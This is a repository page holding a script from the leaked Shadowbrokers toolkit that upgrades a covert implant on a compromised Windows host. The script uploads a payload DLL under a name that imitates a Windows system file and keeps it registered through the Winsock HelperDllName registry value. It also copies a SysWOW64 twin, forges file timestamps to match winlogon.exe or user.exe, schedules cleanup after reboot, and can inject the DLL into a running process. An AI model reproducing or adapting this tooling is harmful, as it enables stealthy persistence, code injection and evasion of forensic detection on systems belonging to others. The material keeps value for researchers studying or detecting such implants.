sneedmca/shadowbrokers-exploits
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
shadowbrokers-exploits/windows/Resources/Pc/Scripts/Install/winnt/WinsockHelp/_Upgrade.dss
Donncha O'Cearbhaill 7f640a83d4 Inital commit of Shadowbrokers 'Lost in Translation' release
2017-04-14 11:45:07 +02:00

260 lines
6.4 KiB
Text
Raw Blame History

@include "_File.dsi";
@include "_Paths.dsi";
@include "_Processes.dsi";
@include "_Versions.dsi";
@include "windows/_RegistryIncludes.dsi";
@echo off;
@disablewow64 on;
if ($argc != 3)
{
echo("* Invalid parmeters", ERROR);
echo();
echo("Usage: $argv[0] <localFile> <procName>");
return false;
}
string $localFile = $argv[1];
string $procName = $argv[2];
string $arch;
_GetArch($arch);
string $regKey = "SYSTEM\\CurrentControlSet\\Services\\Tcpip\\Parameters\\Winsock";
string $regKeyValue = "HelperDllName";
string $defaultPath = "\%\%SystemRoot\%\%\\System32";
# get install name and path
string $payloadPath = $defaultPath;
string $payloadName = "wshencrp.dll";
string $payloadLoadPath = $defaultPath;
string $payloadLoadName = "wshencrt.dll";
string $payloadDeletePath = $defaultPath;
string $payloadDeleteName = "wshencrr.dll";
if (!GetInput("PC DLL install path", $payloadPath, $payloadPath) ||
!GetInput("PC DLL install name", $payloadName, $payloadName) ||
!GetInput("PC DLL temporary (to load) path", $payloadLoadPath, $payloadLoadPath) ||
!GetInput("PC DLL temporary (to load) name", $payloadLoadName, $payloadLoadName) ||
!GetInput("PC DLL temporary (to delete) path", $payloadDeletePath, $payloadDeletePath) ||
!GetInput("PC DLL temporary (to delete) name", $payloadDeleteName, $payloadDeleteName))
{
echo("* Failed to get PC names and paths", ERROR);
return false;
}
# get the system path
string $sysPath;
if (!_GetSystemPath($sysPath))
{
echo("* Failed to get system path", ERROR);
return false;
}
# get the HelperDllName value
string $origKeyValue;
if (!_GetRegistryValue("L",
$regKey,
$regKeyValue,
$origKeyValue) || !defined($origKeyValue))
{
$origKeyValue = "";
}
if ($origKeyValue != "$payloadPath\\$payloadName")
{
echo("* Failed to find $payloadPath\\$payloadName in $regKeyValue key", ERROR);
return false;
}
# get the process id for injection
int $id;
if (prompt("Do you want to perform injection (for instant-grat)? Answer NO if using the same host process as old version!", false))
{
if (StrLen($procName) > 0)
{
if (!_FindProcessOnList($procName, $id) || !defined($id))
{
echo("* Failed to find $procName", ERROR);
}
}
# make sure the user wants to keep going if we don't have a process
if (!defined($id))
{
echo("No process for injection", ERROR);
if (!prompt("Continue?"))
{
return false;
}
}
}
string $usePath = $payloadPath;
if ($usePath == $defaultPath)
{
$usePath = $sysPath;
}
string $useLoadPath = $payloadLoadPath;
if ($useLoadPath == $defaultPath)
{
$useLoadPath = $sysPath;
}
string $useDeletePath = $payloadDeletePath;
if ($useDeletePath == $defaultPath)
{
$useDeletePath = $sysPath;
}
# upload the new file
echo "Uploading new PC";
if (!`put "$localFile" -name "$useLoadPath\\$payloadLoadName" -permanent`)
{
echo(" FAILED", ERROR);
pause;
return false;
}
echo(" FINISHED", GOOD);
# move the old file
echo "Moving old PC";
if (!`move "$usePath\\$payloadName" "$useDeletePath\\$payloadDeleteName"`)
{
echo(" FAILED", ERROR);
echo "Performing recovery";
if (!`delete -file "$useLoadPath\\$payloadLoadName"`)
{
echo(" FAILED", ERROR);
}
else
{
echo(" RECOVERED", GOOD);
}
pause;
return false;
}
echo(" FINISHED", GOOD);
# copy the new file to it's final location
echo "Copying new PC to permanent location";
if (!`copy "$useLoadPath\\$payloadLoadName" "$usePath\\$payloadName"`)
{
echo(" FAILED", ERROR);
echo "Performing recovery";
if (!`move "$useDeletePath\\$payloadDeleteName" "$usePath\\$payloadName"` ||
!`delete -file "$useLoadPath\\$payloadLoadName"`)
{
echo(" FAILED", ERROR);
}
else
{
echo(" RECOVERED", GOOD);
}
pause;
return false;
}
echo(" FINISHED", GOOD);
string $matchName = "user.exe";
if ($arch == "x64")
{
# alternative match name for x64.
$matchName = "winlogon.exe";
echo "Copying SysWOW64 helper DLL";
string $homonymousDll;
$homonymousDll = "$sysPath\\$payloadName";
RegExSub("system32","SysWOW64",$homonymousDll);
# First see if we're upgrading from a PC install that was aware of this bug:
if(_FileExists($homonymousDll))
{
echo(" DONE ALREADY (OK)", GOOD);
}
else
{
# In the normal case, the "orig" file will exist, use that (would be a copy of wshtcpip if PC installed).
# Otherwise, fall back to wshtcpip.dll (someone else broke it, we'll fix it anyway).
string $origSW64Dll;
$origSW64Dll = $origKeyValue;
@regex-global on;
RegExSub("^.*\\\\", "", $origSW64Dll);
@regex-global off;
$origSW64Dll = "$sysPath\\$origSW64Dll";
RegExSub("system32","SysWOW64",$origSW64Dll);
if(!_FileExists($origSW64Dll))
{
# Upgrading from 2.2 and prior, this is actually the expected path, no need to warn here.
$origSW64Dll = "$sysPath\\wshtcpip.dll";
RegExSub("system32","SysWOW64",$origSW64Dll);
}
if(!_FileExists($origSW64Dll))
{
echo(" FAILED (no $origSW64Dll)", ERROR);
pause;
# continue...
}
else
{
if(!`copy $origSW64Dll $homonymousDll`)
{
echo(" FAILED (could not copy source)", ERROR);
pause;
# continue...
}
else
{
echo(" FINISHED", GOOD);
echo "Matching SysWOW64 filetimes";
if (!`matchfiletimes -src "$origSW64Dll" -dst "$homonymousDll"`)
{
echo(" FAILED (times not matched)", ERROR);
pause;
# continue...
}
else
{
echo(" FINISHED", GOOD);
}
}
}
}
}
echo "Matching filetimes with $matchName";
if (!`matchfiletimes -src "$sysPath\\$matchName" -dst "$usePath\\$payloadName"` ||
!`matchfiletimes -src "$sysPath\\$matchName" -dst "$useLoadPath\\$payloadLoadName"` ||
!`matchfiletimes -src "$sysPath\\$matchName" -dst "$useDeletePath\\$payloadDeleteName"`)
{
echo(" FAILED", WARNING);
pause;
# continue...
}
else
{
echo(" FINISHED", GOOD);
}
# mark the temp files for deletion
`delete -file "$useLoadPath\\$payloadLoadName" -afterreboot`;
`delete -file "$useDeletePath\\$payloadDeleteName" -afterreboot`;
if (defined($id))
{
# inject the DLL
echo "Injecting DLL";
if (!`injectdll -library $payloadLoadName -id $id`)
{
echo(" FAILED", ERROR);
}
else
{
echo(" INJECTED", GOOD);
}
}
echo "Upgrade Finished";
echo "$regKeyValue : '$origKeyValue'";
pause;
return true;
Reference in a new issue View git blame Copy permalink